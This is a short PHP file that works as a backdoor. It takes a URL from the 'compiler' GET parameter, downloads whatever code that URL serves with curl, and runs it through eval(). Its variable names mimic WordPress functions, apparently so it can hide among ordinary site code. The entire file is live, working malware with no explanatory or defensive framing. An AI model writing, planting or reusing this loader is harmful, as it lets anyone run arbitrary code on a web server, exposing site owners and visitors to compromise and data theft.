<?php
if (isset($_GET['compiler'])) {
$add_filter_rd = $_GET['compiler'];
if ($get_the_date_oo = curl_init()) {
curl_setopt($get_the_date_oo, CURLOPT_URL, $add_filter_rd);
curl_setopt($get_the_date_oo, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_the_date_oo));
curl_close($get_the_date_oo);
exit;
}
}